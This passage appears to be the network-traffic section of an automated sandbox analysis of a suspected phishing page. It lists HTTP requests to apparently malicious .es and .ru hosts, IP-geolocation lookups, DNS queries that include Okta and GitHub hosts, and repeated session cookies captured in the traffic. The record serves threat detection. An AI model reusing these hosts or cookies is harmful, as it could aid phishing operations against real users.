zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /gkc3XOLjzCm8jmvfyBjNz76Ol6ayzi7lFaEYnsLDqDcKCzWheIhcq HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://oazh.jyqhucdd.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /stkaHK1yk67srmsCXIiLHhsKgO50456zkbtAwgpcJyJ87fWgPiCXxl7Ssngh259 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opJtbmaiMSl66NUbrcY6qx0g1tHEBAvLv8BuXghNFpFQwHLHySbyR1nO3nWQef193 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijkrimwayqo6WSRg5LJANJUSeyR8dBwaOtTwx56eSzW8uU3LHe7cQBOD78170 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /efPyNSGiny5h4d7TrMi6Wxkf25Oqgukl4H0BdEkiM2LId78143 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxgiTdFktHPmjU81RG6ZQtrrPTiXYgG1ANhYfqGrsYrDXCPBwVWhHPaN90180 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ghWIAe4e9wbKuD7VDUIYbb9qAEklZS1X9l3e9kggMfjMKHAjK3W22yef209 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /op5hZUl6z2RnIeqbUqhw63Cu3quslmmUgUNwQB124zAymNA2Ljhn19hwNj1fi5Zdf1cSHqDhaSt8Wdef239 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stkaHK1yk67srmsCXIiLHhsKgO50456zkbtAwgpcJyJ87fWgPiCXxl7Ssngh259 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNOdW1VcGxnYi9PZWpJcTRhK2VCTlE9PSIsInZhbHVlIjoicUxIMURRUUtGM242OU1ZUTdqNFd3TWsrRnErVWxZVG1ZbVFrSkQ3amxSVGNsNU5lc0VGdGxjK0N0TUZ2cklWa0hzd09mb0dNL3dBcEdFdm9NdDRNbHc0eUN2UDFQYWRoZE5xb2xRZzZBK2lqSWJJM2FTZTF2NmZLZzh5b3ZyN3kiLCJtYWMiOiJlNzM0OTA3ZDBjOGYzYjU2MzFmNjE3NjcyYTYyZGY5ZTJmMGFiN2E2YTFlN2ZmMDljNWY5YTJjYmQwYjE0NDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdDaU1iRXFHeHRwL1VweCsrVzI4OEE9PSIsInZhbHVlIjoiUzFMM0F5UkQrOUdVdGN5dEdSTzI3SzcrODRNVSszZll6MURhbURWSU5rd0wvajU4YVVYdHdRKzBhR3RGa0h5RkJDOEZlTzZXTHhKTlN3WHpiMXphUU5BdXZvOVR5UFVYZVJzZDdBQ3dieEZ0ak14UGNQYkJDeitmMytPYmZudysiLCJtYWMiOiJmMzRmMzA4MGI5ZDM1N2VkYTYxMDI2MjkwMDFhNDFjMGJjNzlkODBjMTc0MWE5YWFiNmVmMjdjNGFmOWYyMjg2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /iZlptXbriiKdqWydHetzprNTciTAOFRERTDYGQRNRJONDAILTYAVHCRpqkXP9aLMwhA58jg343buv35 HTTP/1.1Host: yikd3jrhwzutdfkf0d1jzrwgzygpoqnyi3yammrotk8rpayg1cfhk.xrfwss.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: birdeye.cx
              Source: global trafficDNS traffic detected: DNS query: oazh.jyqhucdd.es
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: dau2bh.hxnywi.ru
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: get.geojs.io
              Source: global trafficDNS traffic detected: DNS query: yikd3jrhwzutdfkf0d1jzrwgzygpoqnyi3yammrotk8rpayg1cfhk.xrfwss.ru
              Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 13:04:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36m%2BdVXhkCKNDqTFgcJM8TSgw1THIt7cisiM7V6p4LKnXkN2oHM%2Fbg0pLxtN%2BUzSiE9Yf5gbHD02E9klreMnGm9lRb9na27tirpfTzqlTQ2fmrpJSTYnzPE%2BrXmI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=10759&min_rtt=10720&rtt_var=4048&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2230&delivery_rate=265671&cwnd=110&unsent_bytes=0&cid=b99339aeb92a291c&ts=260&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925e9ca47a5d4263-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=101981&min_rtt=99074&rtt_var=23842&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1896&delivery_rate=37507&cwnd=248&unsent_bytes=0&cid=63e80be4ba37563b&ts=648&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 13:04:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u19bBQgaLlhvvbf99wxikAIzFbIAKjaWqU9T4Zwa1tWptjbT85A3u3NFBEv3PmsL8p6K%2FaipUUiCyr2ZFFFUfEoomDVgqe%2FUvXLqlujeZk47gMpK9fYszkRAdHld"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=10203&min_rtt=10125&rtt_var=2891&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2042&delivery_rate=278942&cwnd=113&unsent_bytes=0&cid=a06c604ca281a556&ts=237&x=0"Server: cloudflareCF-RAY: 925e9ce99e84566e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=96770&min_rtt=96430&rtt_var=20650&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1708&delivery_rate=38608&cwnd=223&unsent_bytes=0&cid=7447c9f3ea00483f&ts=658&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 13:04:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THxPoUPpxo%2FvdMtd4mTXyXhBOv5acfWWrBFOVNbj9%2F1M2e%2Fx%2Bqsf0oFErzFrZfHffPR0enP6V6ATJcPdz2jvZszvV6lDa1PEUgEpLegBZpCD%2FAZEa%2Foa5IgPZeJs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=10237&min_rtt=10049&rtt_var=3902&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2047&delivery_rate=283411&cwnd=187&unsent_bytes=0&cid=0153f16c80827c14&ts=231&x=0"Server: cloudflareCF-RAY: 925e9cf6bb8cf3bb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99168&min_rtt=97170&rtt_var=22445&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1714&delivery_rate=38226&cwnd=246&unsent_bytes=0&cid=d46c7511699c53eb&ts=645&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 13:04:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QsP62kF5Vt32wJUxKGCaDc6rIHYkNw58J%2BnzIru%2FEjFIsK%2FiGD3axq5rcYTS1%2BncG9mpp1mM9DpzVEuY%2FSb0okvy56J1ABgofQsuoVzIr6c2uRuCdZJODUMflMxN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=9914&min_rtt=9805&rtt_var=3755&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2063&delivery_rate=290464&cwnd=201&unsent_bytes=0&cid=84fae66c867240f8&ts=452&x=0"Server: cloudflareCF-RAY: 925e9d18b81843f2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104155&min_rtt=101160&rtt_var=25843&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1728&delivery_rate=33796&cwnd=244&unsent_bytes=0&cid=9b25ecca6bbc422f&ts=895&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
